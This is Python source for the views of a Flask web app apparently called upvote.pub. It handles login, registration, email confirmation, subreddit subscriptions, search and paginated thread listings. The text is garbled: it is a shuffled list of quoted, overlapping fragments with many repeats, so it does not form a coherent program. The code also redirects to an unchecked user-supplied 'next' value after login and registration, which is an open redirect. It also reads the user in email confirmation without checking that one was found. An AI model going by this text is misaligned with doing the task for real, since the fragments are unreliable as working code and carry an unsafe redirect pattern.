process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title,", "\"\"\" if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else:", "@mod.route('/subs/', methods=['GET', 'POST']) def view_all(): \"\"\" \"\"\" subreddit_list = Subreddit.query.all()", "search_module # don't override function name from base.users.forms import RegisterForm,", "search threads and comments \"\"\" query = request.args.get('query') page_title=f\"Search results", "his or her original place before logging in \"\"\" if", "Publication from base.subreddits.models import Subreddit from base.users.decorators import requires_login from", "'success') db.session.commit() else: form = subreddit_subs() for subreddit in subreddit_list:", "user email \"\"\" user = User.query.filter_by(email_token=token).first() if user.email_token == token:", "otherwise fetch a list of defaults \"\"\" if g.get('user'): subreddit_subs", "= base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator", "subreddit_list = Subreddit.query.all() form = None if g.user: if request.form:", "# Sorting if sort_type == 'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif", "import subreddit_subs, sub_form from base.utils.email import send_email from base.utils.misc import", "@requires_login def logout(): session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token):", "base.threads.models import Thread, Publication from base.subreddits.models import Subreddit from base.users.decorators", "if request.path.endswith('trending') else False page_title = \"Trending\" if trending else", "g.user = User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs =", "get_school from base.subreddits.forms import subreddit_subs, sub_form from base.utils.email import send_email", "@mod.route('/search/', methods=['GET']) def search(): \"\"\" Allows users to search threads", "def search(): \"\"\" Allows users to search threads and comments", "werkzeug import check_password_hash, generate_password_hash from logzero import logger from base", "user's password if user and check_password_hash(user.password, form.password.data): # the session", "# -*- coding: utf-8 -*- \"\"\" \"\"\" import os import", "request.method == 'GET': if 'next' in request.args: next = request.args['next']", "# if we are passing in a resultset, that means", "looking to # quickly paginate some arbitrary data, no sorting", "== 'top': base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments': base_query", "= g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set of", "= list(set([x['sub_name'] for x in form_subs if x['value']])) g.user.subreddit_subs =", "g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated Subs\", 'success') db.session.commit() else: form", "subreddits subreddits = Subreddit.query.all() return subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None,", "User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs", "up! Please confirm your email by following the link sent", "in subreddit_list: sform = sub_form() sform.sub_name = subreddit.name sform.sub_group =", "@mod.route('/logout/', methods=['GET', 'POST']) @requires_login def logout(): session.pop('user_id', None) return redirect(url_for('frontends.home'))", "g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set of subreddits", "= subreddit.group if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return render_template('subreddits/subs.html',", "rs.count() subreddits = get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches)", "thread_paginator = process_thread_paginator(rs=rs) #rs = rs.all() num_searches = rs.count() subreddits", "subs def get_subreddits(): \"\"\" Fetch user subreddits otherwise fetch a", "if request.method == 'GET': if 'next' in request.args: next =", "== token: user.email_verified = True db.session.commit() flash(\"Thank you for confirming", "link sent in the confirmation email.', 'success') if 'next' in", "per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\" If not", "email\", \"\"\"Please visit the link below to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"),", "flash(\"Thank you for confirming your email! You can now submit", "# the session can't be modified as it's signed, #", "confirmation email.', 'success') if 'next' in request.form and request.form['next']: return", "g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if", "= User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs')", "base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\" If", "f.read() md = markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc',", "if we are passing in a resultset, that means we", "confirming your email! You can now submit and comment.\", 'success')", "validate user's password if user and check_password_hash(user.password, form.password.data): # the", "if not os.path.exists(page_md): abort(404) with open(page_md, 'r') as f: content", "= \"Trending\" if trending else \"Frontpage\" thread_paginator = process_thread_paginator(trending=trending) return", "page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\",", "some arbitrary data, no sorting if rs: thread_paginator = rs.paginate(cur_page,", "to route the user back to his or her original", "is valid, but doesn't validate password is right if form.validate_on_submit():", "signed, # it's a safe place to store the user", "LoginForm from base.users.models import User from base.threads.models import Thread, Publication", "== 'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top': base_query", "= process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml')", "= ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 'tables', 'footnotes', 'metadata', 'markdown-in-html']) return", "from base.users.models import User from base.threads.models import Thread, Publication from", "threads_per_page = 15 cur_page = request.args.get('page') or 1 cur_page =", "True if request.path.endswith('trending') else False page_title = \"Trending\" if trending", "form.validate_on_submit(): form_subs = form.data.get('subs') form_subs = list(set([x['sub_name'] for x in", "= base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif", "= url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending = True if request.path.endswith('trending') else", "open(page_md, 'r') as f: content = f.read() md = markdown2.markdown(content,", "pull from a thread listing source (subreddit permalink, homepage, etc)", "from base import search as search_module # don't override function", "if g.user: return redirect(url_for('frontends.home')) next = '' if request.method ==", "'success') if 'next' in request.form and request.form['next']: return redirect(request.form['next']) return", "import (Blueprint, request, render_template, flash, g, session, redirect, url_for, abort,", "# sexy line of code :) base_query = subreddit.threads if", "base.subreddits.forms import subreddit_subs, sub_form from base.utils.email import send_email from base.utils.misc", "= rs.count() subreddits = get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator,", "'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new': base_query =", "because many sources pull from a thread listing source (subreddit", "# Default set of subreddits subreddits = Subreddit.query.all() return subreddits", "methods=['GET']) def search(): \"\"\" Allows users to search threads and", "subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness),", "g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default", "or her original place before logging in \"\"\" if g.user:", "token: user.email_verified = True db.session.commit() flash(\"Thank you for confirming your", "1 cur_page = int(cur_page) thread_paginator = None # if we", "= subreddit.threads if subreddit else Thread.query # Filter by user", "import Subreddit from base.users.decorators import requires_login from base.utils.user_utils import get_school", "next=next) @mod.route('/subs/', methods=['GET', 'POST']) def view_all(): \"\"\" \"\"\" subreddit_list =", "not os.path.exists(page_md): abort(404) with open(page_md, 'r') as f: content =", "original place before logging in \"\"\" if g.user: return redirect(url_for('frontends.home'))", "sure data is valid, but doesn't validate password is right", "if sort_type == 'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type ==", "#rs = rs.all() num_searches = rs.count() subreddits = get_subreddits() return", "subreddit.name sform.sub_group = subreddit.group if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform)", "os.path.exists(page_md): abort(404) with open(page_md, 'r') as f: content = f.read()", "we are just looking to # quickly paginate some arbitrary", "else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def get_subreddits(): \"\"\"", "def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md =", "return redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET',", "request, render_template, flash, g, session, redirect, url_for, abort, Markup) from", "a resultset, that means we are just looking to #", "import os import markdown2 from flask import (Blueprint, request, render_template,", "extra work to route the user back to his or", "email or password', 'danger') return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET',", "abstracted because many sources pull from a thread listing source", "request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email or", "list(set([x['sub_name'] for x in form_subs if x['value']])) g.user.subreddit_subs = {'subs':", "base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments))", "the link below to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) #", "off if so user = User.query.filter_by(email=form.email.data).first() # we use werzeug", "subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set of subreddits subreddits", "os import markdown2 from flask import (Blueprint, request, render_template, flash,", "submit and comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def", "render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login def logout(): session.pop('user_id',", "if form.validate_on_submit(): # continue where we left off if so", "def view_all(): \"\"\" \"\"\" subreddit_list = Subreddit.query.all() form = None", "store the user id session['user_id'] = user.id if 'next' in", "as f: content = f.read() md = markdown2.markdown(content, extras =", "= User.query.filter_by(email=form.email.data).first() # we use werzeug to validate user's password", "search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs = rs.all()", "sent in the confirmation email.', 'success') if 'next' in request.form", "email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log the user in, as he", "password', 'danger') return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login", "request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/',", "page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def login(): \"\"\"", "to store the user id session['user_id'] = user.id if 'next'", "name from base.users.forms import RegisterForm, LoginForm from base.users.models import User", "db.session.commit() flash(\"Thank you for confirming your email! You can now", "LoginForm(request.form) # make sure data is valid, but doesn't validate", "as he now has an id db.session.commit() session['user_id'] = user.id", "import send_email from base.utils.misc import random_string, validate_sort_type mod = Blueprint('frontends',", "\"\"\" \"\"\" import os import markdown2 from flask import (Blueprint,", "process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss')", "\"\"\" Allows users to search threads and comments \"\"\" query", "login(): \"\"\" We had to do some extra work to", "base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/') def", "user subs logger.info(g.user) if g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query =", "db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token = user.email_token) email_response = send_email(\"Confirm", "it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token = user.email_token) email_response =", "'next' in request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) return", "sort_type == 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page,", "= None if g.user: if request.form: form = subreddit_subs(request.form) if", "'next' in request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong", "stored in the database user = User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data),", "to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log the user", "'danger') return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login def", "base.utils.email import send_email from base.utils.misc import random_string, validate_sort_type mod =", "def home(sort_type='hot'): \"\"\" If not trending we order by creation", "generate_password_hash from logzero import logger from base import db, app", "if 'next' in request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home'))", "= process_thread_paginator(rs=rs) #rs = rs.all() num_searches = rs.count() subreddits =", "below to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log the", "user back to his or her original place before logging", "False page_title = \"Trending\" if trending else \"Frontpage\" thread_paginator =", "atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return", "creation date \"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending =", "-*- \"\"\" \"\"\" import os import markdown2 from flask import", "= base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top': base_query = base_query.order_by(db.desc(Thread.votes)) elif", "form = LoginForm(request.form) # make sure data is valid, but", "the user is logged in send them home return redirect(url_for('frontends.home'))", "instance not yet stored in the database user = User(username=form.username.data,", "return subs def get_subreddits(): \"\"\" Fetch user subreddits otherwise fetch", "= search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs =", "subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def get_subreddits(): \"\"\" Fetch", "from base import db, app from base import search as", "resultset, that means we are just looking to # quickly", "else: # Default set of subreddits subreddits = Subreddit.query.all() return", "place before logging in \"\"\" if g.user: return redirect(url_for('frontends.home')) next", "@mod.route('/register/', methods=['GET', 'POST']) def register(): \"\"\" Registration page \"\"\" if", "link below to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log", "abort(404) with open(page_md, 'r') as f: content = f.read() md", "== 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new': base_query", "import db, app from base import search as search_module #", "return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md = f\"base/markdown/{page}.md\" if", "app from base import search as search_module # don't override", "page_md = f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404) with open(page_md, 'r')", "user.email_token) email_response = send_email(\"Confirm upvote.pub email\", \"\"\"Please visit the link", "else False page_title = \"Trending\" if trending else \"Frontpage\" thread_paginator", "user is logged in send them home return redirect(url_for('frontends.home')) next", "thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator # sexy line", "with open(page_md, 'r') as f: content = f.read() md =", "user instance not yet stored in the database user =", "from base.threads.models import Thread, Publication from base.subreddits.models import Subreddit from", "redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\" Confirm user email \"\"\" user", "\\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def", "g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs))", "back to his or her original place before logging in", "\"\"\" If not trending we order by creation date \"\"\"", "id db.session.commit() session['user_id'] = user.id flash('Thanks for signing up! Please", "visit the link below to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email)", "\"\"\" query = request.args.get('query') page_title=f\"Search results for '{query}'\" rs =", "if x['value']])) g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated Subs\", 'success') db.session.commit()", "== 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True)", "confirm_email(token): \"\"\" Confirm user email \"\"\" user = User.query.filter_by(email_token=token).first() if", "user.email_verified = True db.session.commit() flash(\"Thank you for confirming your email!", "\"\"\" Fetch user subreddits otherwise fetch a list of defaults", "= base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/')", "else: form = subreddit_subs() for subreddit in subreddit_list: sform =", "to validate user's password if user and check_password_hash(user.password, form.password.data): #", "base import search as search_module # don't override function name", "abort, Markup) from werkzeug import check_password_hash, generate_password_hash from logzero import", "sform = sub_form() sform.sub_name = subreddit.name sform.sub_group = subreddit.group if", "get_subreddits(): \"\"\" Fetch user subreddits otherwise fetch a list of", "return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def", "source (subreddit permalink, homepage, etc) \"\"\" threads_per_page = 15 cur_page", "thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\" If not trending we order", "email \"\"\" user = User.query.filter_by(email_token=token).first() if user.email_token == token: user.email_verified", "'' if request.method == 'GET': if 'next' in request.args: next", "email.', 'success') if 'next' in request.form and request.form['next']: return redirect(request.form['next'])", "= Subreddit.query.all() return subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\"", "if g.user: if request.form: form = subreddit_subs(request.form) if form.validate_on_submit(): form_subs", "form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login def logout(): session.pop('user_id', None)", "user.email_token == token: user.email_verified = True db.session.commit() flash(\"Thank you for", "signing up! Please confirm your email by following the link", "return redirect(url_for('frontends.home')) next = '' if request.method == 'GET': if", "now has an id db.session.commit() session['user_id'] = user.id flash('Thanks for", "= url_for('frontends.confirm_email', token = user.email_token) email_response = send_email(\"Confirm upvote.pub email\",", "threads and comments \"\"\" query = request.args.get('query') page_title=f\"Search results for", "render_template, flash, g, session, redirect, url_for, abort, Markup) from werkzeug", "'next' in request.args: next = request.args['next'] form = RegisterForm(request.form) if", "-*- coding: utf-8 -*- \"\"\" \"\"\" import os import markdown2", "in our database and commit it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email',", "user in, as he now has an id db.session.commit() session['user_id']", "form_subs if x['value']])) g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated Subs\", 'success')", "commit it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token = user.email_token) email_response", "by user subs logger.info(g.user) if g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query", "home return redirect(url_for('frontends.home')) next = '' if request.method == 'GET':", "= 15 cur_page = request.args.get('page') or 1 cur_page = int(cur_page)", "and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email or password',", "None # if we are passing in a resultset, that", "is right if form.validate_on_submit(): # continue where we left off", "next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login def logout(): session.pop('user_id', None) return", "password is right if form.validate_on_submit(): # continue where we left", "'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def search():", "return redirect(url_for('frontends.home')) flash('Wrong email or password', 'danger') return render_template(\"login.html\", form=form,", "\"\"\"Please visit the link below to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link),", "<reponame>danielecook/upvote.pub # -*- coding: utf-8 -*- \"\"\" \"\"\" import os", "fetch a list of defaults \"\"\" if g.get('user'): subreddit_subs =", "subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted because many", "return thread_paginator # sexy line of code :) base_query =", "url_prefix='') @mod.before_request def before_request(): g.user = None if session.get('user_id'): g.user", "to # quickly paginate some arbitrary data, no sorting if", "thread_paginator = None # if we are passing in a", "@mod.route('/login/', methods=['GET', 'POST']) def login(): \"\"\" We had to do", "in \"\"\" if g.user: return redirect(url_for('frontends.home')) next = '' if", "elif sort_type == 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page,", "'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def", "send them home return redirect(url_for('frontends.home')) next = '' if request.method", "are passing in a resultset, that means we are just", "['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 'tables', 'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html',", "= rs.all() num_searches = rs.count() subreddits = get_subreddits() return render_template('home.html',", "request.args: next = request.args['next'] form = LoginForm(request.form) # make sure", "request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form,", "form_subs} flash(\"Updated Subs\", 'success') db.session.commit() else: form = subreddit_subs() for", "return render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def", "utf-8 -*- \"\"\" \"\"\" import os import markdown2 from flask", "database user = User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) #", "g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if sort_type == 'hot':", "process_thread_paginator(rs=rs) #rs = rs.all() num_searches = rs.count() subreddits = get_subreddits()", "mod = Blueprint('frontends', __name__, url_prefix='') @mod.before_request def before_request(): g.user =", "db.desc(Thread.hotness)) return subs def get_subreddits(): \"\"\" Fetch user subreddits otherwise", "subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md = f\"base/markdown/{page}.md\" if not os.path.exists(page_md):", "rs.all() num_searches = rs.count() subreddits = get_subreddits() return render_template('home.html', page_title=page_title,", "from base.utils.misc import random_string, validate_sort_type mod = Blueprint('frontends', __name__, url_prefix='')", "logging in \"\"\" if g.user: return redirect(url_for('frontends.home')) next = ''", "id session['user_id'] = user.id if 'next' in request.form and request.form['next']:", "= Subreddit.query.all() form = None if g.user: if request.form: form", "else Thread.query # Filter by user subs logger.info(g.user) if g.user:", "next = request.args['next'] form = RegisterForm(request.form) if form.validate_on_submit(): # create", "thread listing source (subreddit permalink, homepage, etc) \"\"\" threads_per_page =", "'next' in request.args: next = request.args['next'] form = LoginForm(request.form) #", "= user.id if 'next' in request.form and request.form['next']: return redirect(request.form['next'])", "subreddit.group if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return render_template('subreddits/subs.html', cur_subreddit=None,", "int(cur_page) thread_paginator = None # if we are passing in", "content = f.read() md = markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow',", "If not trending we order by creation date \"\"\" atom_url", "@mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md", "= User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert the", "None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\" Confirm user email", "# continue where we left off if so user =", "We had to do some extra work to route the", "form.password.data): # the session can't be modified as it's signed,", "cur_page = int(cur_page) thread_paginator = None # if we are", "rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator # sexy", "our database and commit it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token", "a thread listing source (subreddit permalink, homepage, etc) \"\"\" threads_per_page", "email by following the link sent in the confirmation email.',", "in request.args: next = request.args['next'] form = RegisterForm(request.form) if form.validate_on_submit():", "if 'next' in request.args: next = request.args['next'] form = RegisterForm(request.form)", "= request.args.get('page') or 1 cur_page = int(cur_page) thread_paginator = None", "import logger from base import db, app from base import", "defaults \"\"\" if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs))", "Sorting if sort_type == 'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type", "sort_type == 'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top':", "if 'next' in request.args: next = request.args['next'] form = LoginForm(request.form)", "\"\"\" if g.user: # If the user is logged in", "extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 'tables', 'footnotes', 'metadata', 'markdown-in-html'])", "(Blueprint, request, render_template, flash, g, session, redirect, url_for, abort, Markup)", "'GET': if 'next' in request.args: next = request.args['next'] form =", "'POST']) def register(): \"\"\" Registration page \"\"\" if g.user: #", "form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST']) def view_all(): \"\"\" \"\"\" subreddit_list", "home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness),", "form.validate_on_submit(): # continue where we left off if so user", "base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top': base_query = base_query.order_by(db.desc(Thread.votes))", "database and commit it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token =", "db, app from base import search as search_module # don't", "def logout(): session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\"", "= request.args['next'] form = RegisterForm(request.form) if form.validate_on_submit(): # create an", "place to store the user id session['user_id'] = user.id if", "= base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif", "redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST'])", "page_title=f\"Search results for '{query}'\" rs = search_module.search(query, orderby='creation', search_title=True, search_text=True)", "query = request.args.get('query') page_title=f\"Search results for '{query}'\" rs = search_module.search(query,", "requires_login from base.utils.user_utils import get_school from base.subreddits.forms import subreddit_subs, sub_form", "base import db, app from base import search as search_module", "Markup) from werkzeug import check_password_hash, generate_password_hash from logzero import logger", "subreddit=None, sort_type='hot'): \"\"\" abstracted because many sources pull from a", "so user = User.query.filter_by(email=form.email.data).first() # we use werzeug to validate", "in a resultset, that means we are just looking to", "user.id flash('Thanks for signing up! Please confirm your email by", "sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return render_template('subreddits/subs.html', cur_subreddit=None, page_title='subs', form=form, subreddit_list=subreddit_list)", "sort_type == 'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date':", "subreddit.threads if subreddit else Thread.query # Filter by user subs", "from base.subreddits.forms import subreddit_subs, sub_form from base.utils.email import send_email from", "now submit and comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST'])", "next = '' if request.method == 'GET': if 'next' in", "@mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def", "\"\"\" import os import markdown2 from flask import (Blueprint, request,", "logger from base import db, app from base import search", "import User from base.threads.models import Thread, Publication from base.subreddits.models import", "sub_form() sform.sub_name = subreddit.name sform.sub_group = subreddit.group if g.user: sform.value=subreddit.name", "from a thread listing source (subreddit permalink, homepage, etc) \"\"\"", "from base.users.forms import RegisterForm, LoginForm from base.users.models import User from", "form_subs = form.data.get('subs') form_subs = list(set([x['sub_name'] for x in form_subs", "subreddit_subs = g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if sort_type", "request.args['next'] form = RegisterForm(request.form) if form.validate_on_submit(): # create an user", "flash('Wrong email or password', 'danger') return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/',", "from base.users.decorators import requires_login from base.utils.user_utils import get_school from base.subreddits.forms", "where we left off if so user = User.query.filter_by(email=form.email.data).first() #", "subreddits = Subreddit.query.all() return subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'):", "data, no sorting if rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True)", "'POST']) def login(): \"\"\" We had to do some extra", "(subreddit permalink, homepage, etc) \"\"\" threads_per_page = 15 cur_page =", "can't be modified as it's signed, # it's a safe", "results for '{query}'\" rs = search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator", "sorting if rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator", "User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert the record", "else \"Frontpage\" thread_paginator = process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title, 